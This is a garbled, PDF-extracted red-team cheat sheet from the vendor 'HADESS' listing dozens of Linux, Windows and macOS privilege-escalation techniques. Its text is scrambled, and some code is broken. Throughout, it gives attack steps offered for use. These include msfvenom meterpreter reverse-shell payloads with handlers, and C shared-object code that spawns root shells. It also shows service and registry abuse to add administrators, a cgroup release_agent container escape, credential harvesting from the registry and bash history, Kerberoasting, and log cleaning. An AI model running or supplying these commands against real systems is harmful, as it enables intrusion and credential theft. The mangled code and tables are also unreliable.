40 Methods For Privilege Escalation Linux-Windows-macOS
40 Methods For Privilege Escalation Linux-Windows-macOS
IO
Difficulty
APT Used
Detection
Detection
Detection
Difficulty
APT Used
Detection
Domain: No 1. https://raw.githubusercontent.com/EmpireProject/Empire/master/data
/module_source/lateral_movement/Invoke-SQLOSCmd.ps1
Local Admin: Yes 2. . .\Heidi.ps1
3. Invoke-SQLOCmd -Verbose -Command “net localgroup administrators
OS: Windows user1 /add” -Instance COMPUTERNAME
Difficulty
APT Used
Detection
Local Admin: Yes 3. 3. (Get-SQLServerLinkCrawl -Verbos -Instance "10.10.10.10" -Query 'select * from
master..sysservers').customer.query
4. 4.
OS: Windows
5. USE "master";
6. SELECT *, SCHEMA_NAME("schema_id") AS 'schema' FROM
Type: Abusing Capabilities "master"."sys"."objects" WHERE "type" IN ('P', 'U', 'V', 'TR', 'FN', 'TF, 'IF');
7. execute('sp_configure "xp_cmdshell",1;RECONFIGURE') at "<DOMAIN>\<DATABASE
NAME>"
Difficulty
8. 5. powershell -ep bypass
9. 6. Import-Module .\powercat.ps1
APT Used
Difficulty
APT Used
Detection
Domain: No 1. Journalctl
2. !/bin/sh
Local Admin: Yes
OS: Linux
Difficulty
APT Used
Detection
Domain: No 1. . .\PowerUp.ps1
2. Invoke-ServiceAbuse -Name ‘vds’ -UserName ‘domain\user1’
Local Admin: Yes
OS: Windows
Difficulty
APT Used
Detection
Domain: No 1. . .\PowerUp.ps1
2. Invoke-ServiceAbuse -Name ‘browser’ -UserName ‘domain\user1’
Local Admin: Yes
OS: Windows
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
Domain: Yes 1. adcspwn.exe --adcs <cs server> --port [local port] --remote
[computer]
Local Admin: Y/N 2. adcspwn.exe --adcs cs.pwnlab.local
3. adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port
OS: Windows 9001
4. adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --
Type: Abusing Services output C:\Temp\cert_b64.txt
5. adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --
Difficulty username pwnlab.local\mranderson --password The0nly0ne! --dc
dc.pwnlab.local
APT Used
Detection
Detection
OS: Windows
Type: Injection
Difficulty
APT Used
Detection
OS: Windows
Type: Injection
Difficulty
APT Used
Detection
OS: Windows
Type: Injection
Difficulty
APT Used
Detection
OS: Windows/Linux
Difficulty
APT Used
Detection
Domain: No 1. history
2. cat /home/<user>/.bash_history
Local Admin: Yes 3. cat ~/.bash_history | grep -i passw
OS: Windows/Linux
Difficulty
APT Used
Detection
OS: Windows/Linux
Type: Sniff
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
Detection
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
SECOND:
1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f
exe > shell.exe
2. .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
3. .\ExploitCapcom.exe
Detection 4. in msf exec `run`
OS: Windows
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Linux/Windows
Difficulty
APT Used
Detection
OS: Linux
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
OS: Windows
Type: NTLM
Difficulty
APT Used
Detection
OS: Windows
Type: NTLM
Difficulty
APT Used
Detection
Type: Dumping
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
OS: Windows
Type: Spraying
Difficulty
APT Used
Detection
OS: Windows
Type: Kerberos
Difficulty
APT Used
Detection
Local Admin: Y/N crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --
kerberoast output.txt
OS: Windows
Type: Kerberos
Difficulty
APT Used
Detection
+982128427515
+982177873383
hadess_security
Identifying and helping to address hidden weaknesses in Fully assess your organization’s threat detection and response
your Applications. capabilities with a simulated cyber-attack.
RASP | Protect Applications and APIs Anywhere Red Teaming Operation | PROTECTION PRO
Fully assess your organization’s threat detection and response
Identifying and helping to address hidden weaknesses in
capabilities with a simulated cyber-attack.
your organization’s security.
3 Golden Ticket
Scheduled Tasks
With
Yes 11 Abusing Browser N 19 OpenVPN NO
Credentials
4 Abusing Interpreter
NO 12 Abusing LDAP YES 20 Bash History NO
Capabilities
6 Abusing ActiveSessions
NO 14 Abusing Certificate
YES 22 NFS Root Squashing
NO
Capabilities Services
7 15
Escalate with TRUSTWORTHY MySQL UDF Code
in SQL Server Y/N Y/N 23 Abusing Access
Y/N
Injection Control List
25 Escalate With
SeImpersonatePrivilege
YES 33 Abusing Gdbus Y/N
26 Escalate With
SeLoadDriverPrivilege
YES 34 Abusing Trusted DC YES
27 Escalate With
ForceChangePassword
YES 35 NTLM Relay YES
32 Abusing Splunk
NO 40 AS-REP Roasting YES
Universal Forwarder
OS: Linux
Difficulty
APT Used
Detection
Domain: No CVE-2016-1531.sh;id
OS: Linux
Difficulty
APT Used
Detection
Domain: No https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-
Esclation
Local Admin: Yes poc.sh
OS: Linux
Difficulty
APT Used
Detection
OS: Linux
Difficulty
APT Used
Detection
Domain: No ./cve-2021-4034
Whoami;id
Local Admin: Yes
OS: Linux
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
Domain: No 1
In Metasploit (msf > prompt) type: use
Local Admin: Yes auxiliary/server/capture/http_basic
In Metasploit (msf > prompt) type: set uripath x
OS: Windows In Metasploit (msf > prompt) type: run
2.
Type: Enumeration & Hunt In taskmgr and right-click on the “iexplore.exe” in the “Image Name”
column
Difficulty and select “Create Dump File” from the popup menu.
3.
APT Used
Detection
1.
Domain: No Open command and type:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v
DefaultUsername
Local Admin: Yes 2.
In command prompt type:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v
OS: Windows DefaultPassword
3.
Notice the credentials, from the output.
4.
Type: Enumeration & Hunt In command prompt type:
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42
-v ProxyUsername
5.
Difficulty
In command prompt type:
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42
APT Used
-v ProxyPassword
6. Notice the credentials, from the output.
7.
In command prompt type:
reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v Password
8.
In command prompt type:
reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v PasswordViewOnly
9.
Make note of the encrypted passwords and type:
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
STARTUP APPLICATIONS
Domain: No 1.
In Metasploit (msf > prompt) type: use multi/handler
Local Admin: Yes In Metasploit (msf > prompt) type: set payload
windows/meterpreter/reverse_tcp
OS: Windows In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) type: run
Type: Enumeration & Hunt Open another command prompt and type:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP
Difficulty Address] -f exe -o
x.exe
APT Used
2.
Place x.exe in “C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\Startup”.
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
Detection
OS: Windows
Type: Phish
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
CERTIFICATE ABUSE
OS: Windows
Difficulty
APT Used
Detection
SUDO LD_PRELOAD
Domain: No 1.
#include <stdio.h>
Local Admin: Yes #include <sys/types.h>
#include <stdlib.h>
OS: Linux void _init() {
unsetenv("LD_PRELOAD");
Type: Injection setgid(0);
setuid(0);
Difficulty system("/bin/bash");
}
APT Used
2.
gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles
3.
sudo LD_RELOAD=tmp/ldreload.so apache2
4.
id
Detection
Domain: No 1.
Mkdir /home/user/.config
Local Admin: Yes 2.
#include <stdio.h>
OS: Linux #include <stdlib.h>
static void inject() _attribute _((constructor));
Type: Injection void inject() {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash
Difficulty -p");
}
APT Used
3.
gcc -shared -o /home/user/.config/libcalc.so -
fPIC/home/user/.config/libcalc.c
4.
/usr/local/bin/suid-so
5.
Detection
id
HADESS | SECURE AGILE DEVELOPMENT
DLL INJECTION
Domain: Y/N 1.
RemoteDLLInjector64
Local Admin: Yes Or
MemJect
OS: Windows Or
https://github.com/tomcarver16/BOF-DLL-Inject
Type: Injection 2.
#define PROCESS_NAME "csgo.exe"
Difficulty Or
RemoteDLLInjector64.exe pid C:\runforpriv.dll
APT Used
Or
mandllinjection ./runforpriv.dll pid
Detection
OS: Windows
Type: Injection
Difficulty
APT Used
Detection
OS: Windows
Type: Injection
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
Domain: No 1.
su - www-data;
Local Admin: Yes 2.
nginxed-root.sh /var/log/nginx/error.log;
OS: Linux 3.
In root user
Type: Abusing File Permission invoke-rc.d nginx rotate >/dev/null 2>&1
Difficulty
APT Used
Detection
Domain: No 1.
su - www-data;
Local Admin: Yes 2.
nginxed-root.sh /var/log/nginx/error.log;
OS: Linux 3.
In root user
Type: Abusing File Permission invoke-rc.d nginx rotate >/dev/null 2>&1
Difficulty
APT Used
Detection
Domain: No 1.
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }'
Local Admin: Yes >/tmp/service.c;
2.
OS: Linux gcc /tmp/services.c -o /tmp/service;
3.
Type: Abusing File Permission export PATH=/tmp:$PATH;
4.
Difficulty /usr/local/bin/sudi-env; id
APT Used
Detection
OS: Linux
Difficulty
APT Used
Detection
Domain: No 1.
Windows_dll.c:
Local Admin: Yes cmd.exe /k net localgroup administrators user /add
2.
OS: Windows x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
3.
Type: Abuse Privilege sc stop dllsvc & sc start dllsvc
Difficulty
APT Used
Detection
Domain: No 1.
sc config daclsvc binpath= "net localgroup administrators user /add"
Local Admin: Yes 2.
sc start daclsvc
OS: Windows
Difficulty
APT Used
Detection
Domain: No 1.
msfvenom -p windows/exec CMD='net localgroup administrators user
Local Admin: Yes /add' -f exe-service -o common.exe
2.
OS: Windows Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
3.
Type: Abuse Privilege sc start unquotedsvc
Difficulty
APT Used
Detection
Domain: No 1.
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v
Local Admin: Yes ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
2.
OS: Windows sc start regsvc
Difficulty
APT Used
Detection
Domain: No 1.
copy /y c:\Temp\x.exe "c:\Program Files\File Permissions
Local Admin: Yes Service\filepermservice.exe"
2.
OS: Windows sc start filepermsvc
Difficulty
APT Used
Detection
Domain: No 1.
In Metasploit (msf > prompt) type: use multi/handler
Local Admin: Yes In Metasploit (msf > prompt) type: set payload
windows/meterpreter/reverse_tcp
OS: Windows In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) type: run
Type: Abuse Privilege Open an additional command prompt and type:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP
Difficulty Address] -f exe -o
program.exe
APT Used
2.
Place program.exe in ‘C:\Program Files\Autorun Program’.
Detection
Domain: No 1.
msfvenom -p windows/exec CMD='net localgroup
Local Admin: Yes administrators user /add' -f msi-nouac -o setup.msi
2.
OS: Windows msiexec /quiet /qn /i C:\Temp\setup.msi
Or
Type: Abuse Privilege SharpUp.exe AlwaysInstallElevated
Difficulty
APT Used
Detection
Domain: Y/N 1.
.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
Local Admin: Yes 2.
!rmpriv
OS: Windows
Difficulty
APT Used
Detection
Domain: Y/N 1.
Conjure-LSASS
Local Admin: Yes Or
syscall_enable_priv 20
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
Domain: Y/N 1.
WRITE_OWNER access to a resource, including files and folders.
Local Admin: Yes 2.
Run for privilege escalation
OS: Windows
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
Domain: Y/N 1.
In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
Local Admin: Yes In Metasploit (msf > prompt) type: set uripath x
In Metasploit (msf > prompt) type: run
OS: Windows 2.
In taskmgr and right-click on the “iexplore.exe” in the “Image Name”
Type: Abuse Privilege column
and select “Create Dump File” from the popup menu.
Difficulty 3.
strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
Domain: Y/N 1.
.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
Local Admin: Yes 2.
TrustExec.exe -m exec -c "whoami /priv" -f
OS: Windows
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
Domain: Y/N 1.
PSBits
Local Admin: Yes Or
PrivFu
OS: Windows 2.
psexec.exe -i -s -d cmd.exe
Type: Abuse Privilege
Difficulty
APT Used
Detection
Domain: Y/N 1.
.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
Local Admin: Yes Or
CredManBOF
OS: Windows 2.
TrustExec.exe -m exec -c "whoami /priv" -f
Type: Abuse Privilege
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
Domain: Y/N 1.
./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
Local Admin: Yes 2.
flog -s 10s -n 200
OS: Windows Or
invoke-module LogCleaner.ps1
Type: Abuse Privilege
Difficulty
APT Used
Detection
+982128427515
+982177873383
hadess_security
Identifying and helping to address hidden weaknesses in Fully assess your organization’s threat detection and response
your Applications. capabilities with a simulated cyber-attack.
RASP | Protect Applications and APIs Anywhere Red Teaming Operation | PROTECTION PRO
Fully assess your organization’s threat detection and response
Identifying and helping to address hidden weaknesses in
capabilities with a simulated cyber-attack.
your organization’s security.
3 Golden Ticket
Scheduled Tasks
With
Yes 11 Abusing Browser N 19 OpenVPN NO
Credentials
4 Abusing Interpreter
NO 12 Abusing LDAP YES 20 Bash History NO
Capabilities
6 Abusing ActiveSessions
NO 14 Abusing Certificate
YES 22 NFS Root Squashing
NO
Capabilities Services
7 15
Escalate with TRUSTWORTHY MySQL UDF Code
in SQL Server Y/N Y/N 23 Abusing Access
Y/N
Injection Control List
25 Escalate With
SeImpersonatePrivilege
YES 33 Abusing Gdbus Y/N 41 DirtyC0w No
26 Escalate With
SeLoadDriverPrivilege
YES 34 Abusing Trusted DC YES 42
CVE-2016-1531
No
27 Escalate With
ForceChangePassword
YES 35 NTLM Relay YES 43 Polkit NO
32 Abusing Splunk
NO 40 AS-REP Roasting YES 48 Intel SYSRET
No
Universal Forwarder
49 PrintNightmare
YES 57 DLL Injection Y/N 65 DLL Hijacking
Y/N
50 Folina
Y/N 58 Early Bird Injection Y/N 66
Abusing
binPath
Services via
No
51 ALPC
No 59 Process Injection through
Y/N 67 Abusing Services via
NO
Memory Section Unquoted Path
52 60
RemotePotato0 Abusing Scheduled Tasks
YES via Cron Path Overwrite Y/N 68 Abusing Services
NO
via Registry
54 62
Abusing File Permission
MS14-068 No No 70 Abusing Services via
NO
via SUID Binaries -
Symlink)
Autorun
55 63
Abusing File Permission via
Sudo No SUID Binaries - Environment No 71 Abusing Services via
No
LD_PRELOAD Variables #1) AlwaysInstallElevated
56 64
Abusing File Permission Abusing File Permission via
via SUID Binaries - .so NO SUID Binaries - Environment No 72 Abusing Services via
No
injection) Variables #2) SeCreateToken
73 Abusing
SeDebug
Services via
No 81 Abusing via No 89 Password
Memory(#1)
Mining in
No
SeCreatePagefile
74 82
Remote Process via Abusing via
90
Password Mining in
Syscalls No No Memory(#2) No
SeSystemEnvironment
(HellsGate|HalosGate)
75 Escalate
DuplicateTokenEx
With
No 83 Abusing via
No 91 Password Mining NO
SeTakeOwnership in Registry
76 Abusing Services
SeIncreaseBasePriority
via
No 84 Abusing via SeTcb
No 92
Password
General
Mining
Events
in
via NO
SeAudit
79 Abusing Services
No 87 Abusing via
No 95 Password Mining in
No
via SeRestore SeCreatePagefile McAfeeSitelistFiles
97 Password Mining
DomainGPPPassword
in
YES 105 Password Mining in
Y/N 113 Abusing WinRM Services
Y/N
Browsers
98 Password
KeePass
Mining in
No 106 Password Mining in Y/N
Files
99 Password
WindowsVault
Mining in
No 107 Password Y/N
Mining in LDAP
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
Domain: No AndrewSpecial.exe
OS: Windows
Difficulty
APT Used
Detection
OS: Linux
Difficulty
APT Used
Detection
OS: Linux
Difficulty
APT Used
Detection
OS: Linux
Difficulty
APT Used
Detection
OS: Linux/Windows/Mac Or
Detection
OS: Linux
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
Domain: No https://github.com/slaeryan/AQUARMOURY/tree/master/Brownie
Brownie
Local Admin: Yes
OS: Windows
Type: Hijack
Difficulty
APT Used
Detection
Domain: No https://github.com/bytecode77/slui-file-handler-hijack-privilege-
escalation
Local Admin: Yes Slui.exe
OS: Windows
Type: Hijack
Difficulty
APT Used
Detection
Domain: No Cdpsgshims.exe
OS: Windows
Type: Hijack
Difficulty
APT Used
Detection
Difficulty
APT Used
Detection
Detection
OS: Windows
Difficulty
APT Used
Detection
Domain: No https://github.com/thehappydinoa/rootOS
Python rootOS.py
Local Admin: Yes
OS: Mac
Difficulty
APT Used
Detection
Domain: No https://github.com/amanszpapaya/MacPer
Python main.py
Local Admin: Yes
OS: Mac
Difficulty
APT Used
Detection
Domain: No https://github.com/amanszpapaya/MacPer
Python main.py
Local Admin: Yes
OS: Mac
Difficulty
APT Used
Detection
Domain: No https://github.com/amanszpapaya/MacPer
Python main.py
Local Admin: Yes
OS: Mac
Difficulty
APT Used
Detection
Domain: No https://github.com/bazad/launchd-portrep
./launchd-portrep 'touch /tmp/exploit-success'=
Local Admin: Yes
OS: Mac
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
OS: Windows
Difficulty
APT Used
Detection
DYNAMIC PHISHING
OS: Mac
Type: Phish
Difficulty
APT Used
Detection
RACE CONDITIONS
OS: Windows
Difficulty
APT Used
Detection
Detection
Domain: No mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp &&
mkdir /tmp/cgrp/x
Local Admin: Yes echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
OS: Linux echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo "#!/bin/sh" > /cmd
Type: Abusing Capabilities echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
Difficulty sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
cat /output
APT Used
Detection
Difficulty
APT Used
Detection
UNIX WILDCARD
OS: Linux
Type: Injection
Difficulty
APT Used
Detection
OS: Linux
Type: Injection
Difficulty
APT Used
Detection
Domain: No /etc/logstash/logstash.yml
input {
Local Admin: Yes exec {
command => "whoami"
OS: Linux interval => 120
}
Type: Injection }
Difficulty
APT Used
Detection
Domain: No UsoDllLoader.exe
OS: Linux
Type: Injection
Difficulty
APT Used
Detection
OS: Windows
OS: Windows
OS: Windows
OS: Windows
OS: Windows
OS: Windows
OS: Windows
OS: Windows
OS: Windows
Domain: No https://github.com/sailay1996/delete2SYSTEM
.\poc.ps1
Local Admin: Yes
OS: Windows
OS: Windows
https://attack.mitre.org/groups/
https://www.deepinstinct.com/blog/lsass-memory-dumps-are-
stealthier-than-ever-before-part-2
https://twitter.com/monoxgas
+982128427515
+982177873383
hadess_security
Identifying and helping to address hidden weaknesses in Fully assess your organization’s threat detection and response
your Applications. capabilities with a simulated cyber-attack.
RASP | Protect Applications and APIs Anywhere Red Teaming Operation | PROTECTION PRO
Fully assess your organization’s threat detection and response
Identifying and helping to address hidden weaknesses in
capabilities with a simulated cyber-attack.
your organization’s security.